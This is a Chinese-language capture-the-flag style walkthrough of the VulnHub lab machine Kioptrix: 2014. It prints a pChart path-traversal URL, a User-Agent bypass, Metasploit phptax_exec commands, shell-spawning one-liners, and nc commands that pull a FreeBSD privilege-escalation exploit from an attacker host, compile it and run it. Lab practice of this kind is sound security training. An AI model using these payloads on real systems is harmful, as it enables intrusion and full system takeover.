Vulnhub靶机系列：Kioptrix: 2014 (#5)

这次的靶机是Vulnhub靶机：Kioptrix: 2014 (#5)，这篇文章我将会示范一下使用legion进行信息收集。

靶机地址及相关描述

https://www.vulnhub.com/entry/kioptrix-2014-5,62/

靶机设置

这个靶机在虚拟机导入后，需要 卸载原来的网卡，再重新添加一块网卡，注意，是卸载原来的再安装，不是把原来的换了。
netdiscover和curl确定靶机


我的靶机ip为192.168.190.190

利用知识及工具

UA伪造、nc、searchsploit、burpsuite、legion等

信息收集并getshell

启动legion legion

扫描了很久，看了下结果，nikto有个远程代码执行，但是利用条件太苛刻
所以还是从web寻找突破线索。

只有静态的页面，f12看下,可以发现有个目录

进入看下，我也不知道下面这玩意干嘛的

只能寻找关于这玩意的线索，根据程序命名习惯的话，目录可能就是这系统的名字，所以直接搜下相关漏洞searchsploit pchart运气不错，直接搜到这个版本的一个漏洞

尝试利用漏洞，http://192.168.190.190/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

确实存在这个漏洞，但是问题来了，卡住了，
最后决定看看8080端口的

虽然这货有8080端口，但是我却没有权限进入

思考常见原因：ip做了限制，抑或是UA，抑或是refer限制？（好吧，我坦白了，这是我做ctf总结的）结合前面的任意文件读取，尝试读apache的配置（legion结果说明是apache）
tip1：http://wiki.apache.org/httpd/DistrosDefaultLayout
tip2：几种查找apache配置的方法

find / -name httpd.conf
locate httpd.conf
/etc/httpd/conf/httpd.conf
ps -ef | grep apache
apache2ctl -V
httpd -V

在tip1中找到该系统对应的配置文件目录/usr/local/etc/apache22/httpd.conf
按照上面几种权限不够的思路寻找配置信息

然后我们把UA改成这个就欧克Mozilla/4.0 Mozilla4_browser
老规矩，祭出burp

就看到这玩意，通过上面的目录通常为系统名这条经验规律进行搜索

好吧，只找到了一个msf的利用和GitHub有人专门为这个写的exp
https://github.com/d34dfr4m3/kioptrix_l5_xpl

还是用msf，虽然oscp到时候只能用一次，55555

use exploit/multi/http/phptax_exec 
set rhosts 192.168.190.190
set rport 8080
 exploit 

到这里就拿到了shell,可以看到权限很低

提权

前面看到了passwd，知道了系统，当时也考虑过有没有因为系统太老，直接日进去的可能。现在来找提权的信息

先生成一个tty，方便后面操作，以下是几个方式，上篇文章也有提过，权当复习

python -c ‘import pty; pty.spawn(“/bin/bash”)’
echo os.system('/bin/bash') 
/bin/sh -i

再看下有没有nc，vi这些工具方便传exp，发现没有vim，但是有vi、nc、gcc，而且在现在的操作权限内

找下expsearchsploit freebsd 9 | grep Privilege

然后在这里我惊喜的发现实际我没有生成一个tty,还是要把代码nc过去，而且刚才的骚操作导致我的msf的shell断了，重开了一个

wget https://www.exploit-db.com/download/28718 
发送端 
nc -lvp 6666 < 28718
接收端 
cd /tmp 
nc -nv 192.168.190.177 6666 >exploit.c
gcc exploit.c
./a.out

总结

提权太操蛋了，还是那句话，本质是信息收集